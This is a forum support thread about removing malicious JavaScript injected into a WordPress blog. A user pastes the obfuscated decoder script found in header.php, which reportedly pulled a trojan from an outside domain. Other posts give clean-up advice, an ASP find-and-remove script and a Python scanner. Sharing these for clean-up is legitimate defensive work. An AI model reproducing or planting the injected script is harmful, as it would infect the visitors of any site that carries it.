• Resolved hizkia

    (@hizkia)


    Hello,
    For some unknown reason, my blog has been infected by a malicious Java script that downloads a trojan virus to the viewers’ machines. I don’t know how the script could go there.

    I need help to remove the script, but I have no idea where to look, and what the script looks like.

    Please be warned that you will need your Antivirus up to check what I meant at http://gunawan.net/blog. At the bottom left corner, you will see that it tries to connect to different sites. Most of the time it tries to connect to golnanosat.com

    Please HELP! Thank you.

Viewing 3 replies - 1 through 3 (of 3 total)
  • NoScript for Firefox is wonderful.

    <meta name="generator" content="WordPress 2.2" /> <!-- leave this for stats -->

    That's your root problem.

    You're running an insecure version of WP — one that is exploitable using nothing more than the ability to copy and paste code off milw0rm.

    And that JavaScript might not be the only incursion.

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

    Read that, then read some of these:

    http://wordpress.org/search/hacked?forums=1

    The best and surest thing to do is to shitcan all the files on your server. And start fresh. Save just your wp-config.php, go get a fresh copy of the 2.2 files, and upload those clean files.

    THEN: IMMEDIATELY go through the upgrade process.

    Then, CHANGE ALL YOUR PASSWORDS, including the MySQL one.

    Then go through your database, making sure that there are NO rogue users, and no code inserted into it that shouldn't be.

    Then be a nice neighbor, and let your host know.

    Those are general instructions, your mileage may vary.

    Thread Starter hizkia

    (@hizkia)

    Thank you very much! I’ve been in communication with my host about this. I’ll upgrade to the current version if that’s available via my host.

    In the meantime I think I solved the problem. Looks like the script was embedded into the header.php file and it looks like this:

    <!– start counter :rkgi58s:wpjsandif –><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,32,53,60,46,41,2,21,9,33,0,0,0,0,0,0,58,48,51,50,4,1,30,12,44,7,31,26,18,19,49,24,11,13,59,27,34,22,38,54,28,25,6,0,0,0,0,8,0,36,35,29,14,45,47,16,0,42,39,62,56,37,43,57,17,52,61,40,3,10,55,23,20,5,15);for(j=Math.ceil(l/b);j>0;j–){r=””;for(i=Math.min(l,b);i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc(“YKeNwBX2pws2wSGV6WXqpwrjuil2gFYBuScqPi326ns2pMXquuc2zSeCtB3APkH26UO9pBc2hb51ptXvpnlBDzQNUS32Gwcq64YVuKeNwBX2pf8ifV8BtJQN_tX9UIQv8tGV6ZGBUwcCDBrjy4HCPtHj6Us2wSGV6WXqpwrjuil2gFYBuScqPi326ns2pMXquuc2GzHCt0H2PUrC6PlVYi_BtJQN_t3V”)</script><!– end counter :rkgi58s:wpjsandif –>

    I’m not sure if this is the malicious script or not, but if I got rid of those lines my site downloads faster and it doesn’t try to go to any foreign addresses such as golnanosat.com

    Thanks again!

    I had the same problem and I am not even using WordPress. I had a malicious JS injected at the bottom of every page on the non-profit health information provider, so I devised this simple script to do all the dirty work for me…

    `<%
    ' Remove a string from all asp, htm and html pages on the entire website
    ' Usage:
    ' http://www.ursiteurl.com/fixor.asp?remove=WHAT_EVER_UR_PROBLEM
    ' Credits:
    ' Junaid Ali Qureshi, http://www.doctor-dubai.com, JunaidAliQureshi.blogspot.com

    Response.Buffer = False

    Const ForReading = 1
    Const ForWriting = 2
    Set objFSO = CreateObject("Scripting.FileSystemObject")

    ' Start at the web root and walk every folder below it
    subfolder = Server.MapPath("\")
    Response.Write(subfolder & "<br>")
    Set xFolder = objFSO.GetFolder(subfolder)

    fixfilesin(xFolder)

    Function fixfilesin(fixfiles)
        Dim FileName, Find, ReplaceWith, FileContents, dFileContents
        Set xFiles = fixfiles.Files

        For Each xFile In xFiles

            ' Only touch .asp, .htm and .html files
            If Right(LCase(xFile.Name), 3) = "asp" Or Right(LCase(xFile.Name), 3) = "tml" Or Right(LCase(xFile.Name), 3) = "htm" Then

                Find = Request.QueryString("remove")
                ReplaceWith = ""
                FileName = xFile.Path
                Response.Write(FileName & "<br>")

                ' Read source text file
                FileContents = GetFile(FileName)

                ' Replace all occurrences of the string in the source file (case-insensitive)
                dFileContents = Replace(FileContents, Find, ReplaceWith, 1, -1, 1)

                ' Compare source and result
                If dFileContents <> FileContents Then
                    ' Write result if different
                    WriteFile FileName, dFileContents
                    Response.Write(FileName & " contents : **************************************")
                    Response.Write "Replace done.<br><br>"

                    If Len(ReplaceWith) <> Len(Find) Then ' Can we count the number of replacements?
                        Response.Write((Len(dFileContents) - Len(FileContents)) / (Len(ReplaceWith) - Len(Find)) & " replacements.")
                    End If
                Else
                    Response.Write "Searched string Not In the source file<br>"
                End If

            End If

        Next

        ' Recurse into subfolders
        For Each fldr2 In fixfiles.SubFolders
            fixfilesin(fldr2)
        Next
    End Function

    ' Read a text file and return its contents as a string.
    Function GetFile(FileName)
        If FileName <> "" Then
            Dim FS, FileStream
            Set FS = CreateObject("Scripting.FileSystemObject")
            On Error Resume Next
            Set FileStream = FS.OpenTextFile(FileName, ForReading)
            GetFile = FileStream.ReadAll
            FileStream.Close
        End If
    End Function

    ' Write string as a text file.
    Function WriteFile(FileName, Contents)
        Dim OutStream, FS

        ' On Error Resume Next
        Set FS = CreateObject("Scripting.FileSystemObject")
        Set OutStream = FS.OpenTextFile(FileName, ForWriting, True)
        OutStream.Write Contents
        OutStream.Close
    End Function

    %>`
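An added example, not part of the thread or any poster's code: a Python script for the same clean-up that runs from a shell on the server instead of through a URL, reports by default, and rewrites a file only after saving the original to a backup directory outside the web root. The marker comments and the `String.fromCharCode` plus `document.write` heuristic come from the block hizkia posted; `SAMPLE`, `find_injections`, `scan_tree` and the extension list are assumptions of this example.

```python
import re
import shutil
from pathlib import Path

DASH = r"(?:--|\u2013)"  # "--", or the en dash that forum software turns it into
# Paired marker comments as in the thread: start counter :<tag> ... end counter :<tag>
MARKED = re.compile(
    rf"<!{DASH}\s*start counter :(\S+)\s*{DASH}>.*?<!{DASH}\s*end counter :\1\s*{DASH}>",
    re.S | re.I)
SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
EXTS = {".php", ".asp", ".htm", ".html"}
# Constructed sample: same shape as the block in the thread, harmless body.
SAMPLE = ("<html><head><!-- start counter :abc123:demo --><script>"
          "document.write(String.fromCharCode(72,105))</script>"
          "<!-- end counter :abc123:demo --></head><body>post</body></html>")

def find_injections(text):
    """Return (kind, start, end) for marked blocks and obfuscated-looking scripts."""
    hits = [("marked-block", m.start(), m.end()) for m in MARKED.finditer(text)]
    for m in SCRIPT.finditer(text):
        # Heuristic taken from the thread's sample: a script that rebuilds text with
        # String.fromCharCode and writes it into the page. Reported, never auto-removed.
        obfuscated = all(k in m.group(1) for k in ("String.fromCharCode", "document.write"))
        if obfuscated and not any(s <= m.start() < e for _, s, e in hits):
            hits.append(("obfuscated-script", m.start(), m.end()))
    return hits

def scan_tree(root, backup_dir=None):
    """Report findings per file. With backup_dir set, save the original there
    and strip the marked blocks from the live file."""
    root, report = Path(root), {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTS:
            continue
        text = path.read_bytes().decode("utf-8", "surrogateescape")
        hits = find_injections(text)
        if not hits:
            continue
        rel = path.relative_to(root)
        report[rel.as_posix()] = [kind for kind, _, _ in hits]
        cleaned = MARKED.sub("", text)
        if backup_dir is not None and cleaned != text:
            dest = Path(backup_dir) / rel
            dest.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, dest)  # keep the infected original as evidence
            path.write_bytes(cleaned.encode("utf-8", "surrogateescape"))
    return report

if __name__ == "__main__":
    print(find_injections(SAMPLE))
```

Call `scan_tree` on the web root first to review the report, then again with `backup_dir` set; files flagged only as `obfuscated-script` are left for manual review.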

  • The topic ‘Remove malicious Java script’ is closed to new replies.